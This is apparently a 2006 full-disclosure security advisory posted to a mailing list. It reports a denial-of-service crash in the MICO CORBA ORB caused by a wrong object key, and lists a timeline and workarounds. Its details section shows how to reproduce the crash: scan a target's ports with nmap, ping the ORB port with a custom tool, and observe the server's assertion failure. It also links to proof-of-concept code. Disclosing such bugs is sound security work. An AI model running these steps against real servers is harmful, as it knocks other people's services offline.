[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Mico crashes when contected with wrong IOR / DoS

== == == TOC == == ==

1. Affected Vendor
2. Affected Product
3. Vulnerability
4. Safety Hazard
5. Disclosure Timeline
6. Vendor Response
7. Patch / Workaround
8. Vulnerability Details


== 1. Affected Vendor ==
   Object Security

== 2. Affected Products ==
   MICO - Mico is CORBA, Open Source ORB
   tested on Version
       and latest from repository
   more infos: http://www.mico.org

== 3. Vulnerability ==
   MICO crashes when contacted with wrong object key (part: orb-id or
   orb-creation time)

== 4. Safety Hazard ==
   critical, potential Denial-of-Service

== 5. Disclosure Timeline ==
   2006-06-27 Problem found and analysed / tested with other versions
   2006-06-29 Vulnerability reported to vendor and MICOs
   2006-07-05 2nd mail to vendor and mailing-list
   2006-07-06 Full disclosure

== 6. Vendor Response ==

== 7. Patch / Workaround ==
   No Patch avaible yet.

   possible Workarounds
   a) Don't use MICO in or over public networks
   b) Protect MICO with an (IIOP) firewall

== 8. Vulnerability Details ==
   The following is for educational purposes only!

   Start the orb, you'll crash # Example code
   -> http://wwwstud.informatik.uni-rostock.de/~cb098/mico_bug.tgz
       $ ./server
   scan your target...
       $ sudo nmap -sS -oM results.nmap -p 1-65535 /
           | grep unknown
       8010/tcp  open  unknown
       49576/tcp open  unknown
       51140/tcp open  unknown

   One of these port could be the orb. Lets try to ping
   (object._non_exists()) the last one. For this I'm using a special
   handmade CORBA-Ping-Prog. It's also possible to use JacORBs pingo..
   My JPing is avaible at
       $ java JPing -p corbaloc::
     orb.string_to_object             ... ok
     object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
     vmcid: SUN  minor code: 208 completed: Maybe

   The line above are indicating that there was something wrong. On
   every active port, you'll get COMM_FAILURE; but on the ORB-port
   OBJECT_NOT_EXIST is expected and mandatory by OMG CORBA Spec.
    (See http://www.omg.org)

   -- mico testserver crashed / output --
   A look into server terminal let us know, that there's sth. wrong.

   $ ./server
   0000001010000160000006c6f63616c686f73 742e6c6f63616c646f6d61696e00c4c71
   0100 000001000000010000001400000001000000010001000000000009010100000000
   00 # myior <-- everything is ok until here
   server: orb.cc:332: void CORBA::ORBInvokeRec::set_answer_invoke(CORBA::
   InvokeStatus, CORBA::Object*, CORBA:: ORBRequest*, GIOP::AddressingDisp
   osition): Assertion `_type == RequestInvoke' failed.